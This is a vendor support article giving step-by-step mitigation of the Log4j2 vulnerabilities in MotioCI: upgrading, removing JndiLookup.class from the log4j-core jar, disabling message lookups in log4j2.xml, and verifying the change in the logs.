MotioCI - Mitigation Procedure for Log4j2 Vulnerability (CVE-2021-45046, CVE-2021-45105, CVE-2021-44228)

MotioCI - Mitigation Procedure for Log4j2 Vulnerability (CVE-2021-45046, CVE-2021-45105, CVE-2021-44228)

MotioCI - Mitigation Procedure for Log4j2 Vulnerability (CVE-2021-45046, CVE-2021-45105, CVE-2021-44228)


Motio has released a new fix level for MotioCI 3.2.10 FL9. This version of MotioCI includes Log4j2 v2.17, which addresses all three CVEs (45105, 45046, 44228). MotioCI 3.2.10 FL8 only protects against the 45046 CVE and 44228 CVE while MotioCI 3.2.10 FL7 only protects against the 44228 CVE. We recommend all customers who are able update to the new release to eliminate these CVEs.  In lieu of that we can offer the following mitigation procedure that will eliminate this vulnerability if upgrade is not possible at this time.

There are several mitigation steps that can be taken to immediately close off this vulnerability for existing MotioCI installations (see below). The mitigation steps are comprised of:

  1. Locate the log4j-core-2.9.0.jar file under the MotioCI installation and remove the org/apache/logging/log4j/core/lookup/JndiLookup.class file from the jar (using WinZip or similar).

  2. Edit the Main Process and Worker Process log4j2.xml configuration files to disable message lookups.

  3. Remove the jndiLookup.class from each dispatcher and CM node with the active versioning plugin installed and stop/start Cognos services.

If you have any questions or would like assistance please open a support ticket or send an email to help@motio.com and our support team will be happy to assist.

 

The locations of the three files involved vary by MotioCI version.

 

MotioCI 3.2.9 and Earlier

File

Location (relative to MotioCI installation directory)

Log4j2 core jar

tomcat\webapps\ROOT\WEB-INF\lib\log4j-core-2.9.0.jar


Main Process

Logging Config

tomcat\webapps\ROOT\WEB-INF\classes\log4j2.xml


Worker Process

Logging Config

workers\configuration\log4j2.xml

 

MotioCI 3.2.10 (FL1 through FL6)

File

Location (relative to MotioCI installation directory)

Log4j2 core jar

motioci\WEB-INF\lib\log4j-core-2.9.0.jar


Main Process

log4j2.xml

motioci\WEB-INF\classes\log4j2.xml


Worker Process

log4j2.xml

workers\configuration\log4j2.xml

 

 

Step 1 - Remove the Vulnerable Class from log4j-core-2.9.0.jar

  1. Stop the MotioCI Service 

  2. Find the log4j-core-2.9.0.jar under your MotioCI root directory (see table above for the exact location).

  3. Remove the org\apache\logging\log4j\core\lookup\JndiLookup.class file from this jar.

    1. On windows:

      1. Open this jar file in your favorite zip utility (e.g. WinZip or 7-Zip)

      2. In the Zip utility, navigate to org\apache\logging\log4j\core\lookup

      3. Select the JndiLookup.class

      4. Delete this file from the zip

  1. On Linux or Unix, use a command line tool like zip or jar to remove this file from the jar. For example: 

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

 

Step 2 - Adjust the Logging Configuration Files to Disable Message Lookup


In this step, we will edit the message pattern specified in the Main Process and Worker Process log4j2.xml files to explicitly disable message lookup.  


This is done by changing a %m in the specified logging pattern to %m{nolookups}.


Using a text editor of your choice, apply the following changes to BOTH the Main Process and Worker Process log4j2.xml files (two files need to be edited).  Consult the tables above for the locations of these files.


For each log4j2.xml file: 

  1. Open the file in a text editor

  2. Locate the two lines for modification: 


<PatternLayout pattern="[%X{workerPid}] [%t][%c{1}]: %m%n"/>

<PatternLayout pattern="%d %-5p [%t][%X{txId}] [%c{1}]: %m%n"/>


  1. Change these two lines to this. NOTE that we’ve also changed the colon to a semicolon so that we’ll have a visual indicator in the logs that the change has been applied.


<PatternLayout pattern="[%X{workerPid}] [%t][%c{1}]; %m{nolookups}%n"/>

<PatternLayout pattern="%d %-5p [%t][%X{txId}] [%c{1}]; %m{nolookups}%n"/>


  1. Save the modified file

 

Now we can restart the MotioCI service.


Step 3 - Remove the JndiLookup.class from each Cognos node with MotioCI Active Versioning plugin installed

The vulnerable version of log4j (log4j-core-2.9.0.jar) is also a part of the MotioCI active versioning installation.  If active versioning is used by the customer, the active versioning plug-in is installed on all content manager and dispatcher nodes in the Cognos environment.  Therefore, mitigation steps should be taken on all Cognos content manager and dispatcher nodes.

To mitigate, remove the vulnerable class from log4j-core-2.9.0.jar on each Cognos node with the MotioCI active versioning plug-in installed.
  1. Find the log4j-core-2.9.0.jar in each Cognos dispatcher and content manager node
    <Cognos root>/webapps/MotioCI-agent/WEB-INF/lib/log4j-core-2.9.0.jar
  2. Edit and remove the JndiLookup.class from the JAR using the same steps as in "Step 1."
  3. Stop and Start the Cognos service.
This is an example of the JndiLookup.class file in the log4j-core-2.9.0.jar file on a Cognos node:


Verifying that the Mitigation Has Been Successfully Applied

After MotioCI has restarted, download the log files from within the MotioCI. For log messages generated since the restart, each log message should now have a semicolon directly after the logger class name.  For example, in the sample log messages below, there is a semicolon after [StartupListener].

 

2021-12-12 10:42:23,886 INFO  [main] [] [StartupListener]; StartupService [com.focus.rclci.startup.LoadDatabasePropertiesStartupService] took [00:00:04.353] to complete successfully.

2021-12-12 10:42:23,887 INFO  [main] [] [StartupListener]; Executing StartupService  [com.focus.rclci.startup.MaintenanceStartupService]